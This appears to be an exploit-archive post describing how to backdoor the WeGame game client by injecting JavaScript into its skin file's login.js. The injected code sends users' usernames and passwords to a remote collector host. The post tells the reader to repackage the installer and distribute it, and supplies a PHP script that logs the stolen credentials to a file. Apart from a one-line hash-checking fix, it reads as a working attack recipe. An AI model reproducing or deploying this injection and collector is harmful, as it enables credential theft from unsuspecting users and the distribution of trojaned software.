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WeGame Code Execution/Credential stealing Exploit

Security Risk High
web applications
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Title: WeGame Code Execution/Credential stealing Exploit
Author: compl3x
Vendor: Wegame.com/Tagged.com
Versions Affected: All
Site: compl3x.wordpress.com
Contact: compl3x@tormail.org
Twitter: @Complex360

WeGame uses a file called default.skn, found in the installation
directory, to load skins for the WeGame client. This file is simply a 
renamed zip archive and contains images, html files and javascript files. 
These javascript files are not hash checked at startup, and thus, code 
can be injected to transmit username and password to a remote server.

The code below will transmit usernames and passwords to a remote server.
However, the WeGame client will execute any javascript contained in these
files, so there is a much wider scope to what is possible.

-Implement hash checking of vital default.skn files on startup.


:::Part 1 - Backdooring the client:::
First, lets look inside the default.skn file:
	unzip -qq default.skn && find ./skin -name "*.js"


Whilst we could theoretically inject code into the .html files also,
the .js files are used to process actions. The one we are most 
interested in is login.js, for this file executes a function called
doLogin( ) when you umm...login to WeGame. dlconfirm.js and dl-started.js
could be used to retrieve data about what's happening in-client, but that's
not really important.

So... doLogin( ) in login.js:

function doLogin( )
	var pass = '';
	// doLogin( user, pass, hashed, remember_me );
	// if we have a saved password hash and it wasn't changed, send it along
	if ( document.getElementById('real-pw').value == edit_pw_text )
		pass = hashed_pw;
	else // otherwise, send whatever the user entered
		pass = getValue( "password" );
	wegame.doLogin( getValue( "username" ), pass, hashed, getChecked( "rememberme" ) );

So, we can easily grab the Values of "username" and "password".
	creds = (getValue( "username" ) + "|" + getValue( "password" ));

However, we could simply send them as PHP variables to our processing script:
window.open("http://example.com/wegame.php?user=" + getValue( "username" ) + "&pass=" + getValue( "password" ), "Logging into WeGame...","location=1,status=0,scrollbars=0, width=0,height=0");

BANG! Stick this into the doLogin( ) function, and credentials will be sent to you.

function doLogin( )
	var pass = '';
	// doLogin( user, pass, hashed, remember_me );
	// if we have a saved password hash and it wasn't changed, send it along
	if ( document.getElementById('real-pw').value == edit_pw_text )
		pass = hashed_pw;
	else // otherwise, send whatever the user entered
		pass = getValue( "password" );
        window.open("http://example.com/wegame.php?user=" + getValue( "username" ) + "&pass=" + getValue( "password" ), "Logging into WeGame...","location=1,status=0,scrollbars=0, width=0,height=0");
	wegame.doLogin( getValue( "username" ), pass, hashed, getChecked( "rememberme" ) );

Finally, re-zip the "skin" folder, stick it into the installer and distribute.

Part 2 - setting up the server:
Now you have a backdoored client and installer, it's time to setup your server:
Write your own processing script if you wish in whatever language, but here's my
//If you don't have the username, there is no use of having the password.
	$user = $_GET['user'];
	$pass = $_GET['pass'];
	$myFile = "text.txt";
	$fh = fopen($myFile, 'a');
	$Data = ("$user|$pass");

//If the login process doesn't complete, the client times out with a "wrong user/pass" alert. 
//To exfiltrate data, you NEED to terminate the window.

As said in the comment above, the script NEEDS to terminate. My script writes window.close();
This works fine as WeGame opens it as a child of the client (No, NoScript will NOT protect you)

- compl3x.wordpress.com  -
- twitter.com/complex360 -
- github.com/compl3x	 -

#  0day.today [2024-07-04]  #